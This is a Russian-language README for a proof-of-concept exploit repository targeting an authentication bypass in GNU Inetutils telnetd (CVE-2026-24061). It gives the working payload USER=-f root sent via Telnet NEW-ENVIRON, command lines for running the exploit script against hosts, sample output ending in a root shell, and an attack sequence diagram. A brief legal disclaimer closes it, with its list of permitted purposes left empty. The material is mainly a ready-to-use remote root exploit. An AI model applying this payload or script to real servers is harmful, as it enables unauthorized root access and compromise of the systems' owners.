
Эксплойт proof-of-concept для обхода аутентификации в GNU Inetutils telnetd (CVE-2026-24061), который запускает root-оболочку через сформированную переменную USER в NEW-ENVIRON.
Этот репозиторий содержит эксплойт Proof‑of‑Concept для уязвимости удалённого обхода аутентификации в GNU Inetutils telnetd.
Проблема возникает из-за того, что telnetd некорректно обрабатывает переменную окружения USER, полученную через Telnet‑согласование NEW‑ENVIRON, перед вызовом /bin/login.
При передаче:
USER=-f root
telnetd фактически выполняет:
/bin/login -f root
что обходит аутентификацию и немедленно предоставляет root‑shell.
Telnet NEW‑ENVIRON позволяет клиентам задавать переменные окружения во время согласования сессии.
Уязвимый telnetd передаёт USER напрямую в login:
/bin/login -f "$USER"
Атакующий задаёт:
USER=-f root
Результат:
/bin/login -f root
Флаг -f указывает login пропустить аутентификацию, предоставляя доступ с правами root.
Внешние зависимости не требуются.
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
Если система уязвима:
# id
uid=0(root) gid=0(root)
#
Вы получаете интерактивный root‑shell.
python3 cve-2026-24061.py 10.10.10.20
Вывод:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root session
Данный эксплойт предоставлен для:
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете разрешения, является незаконным.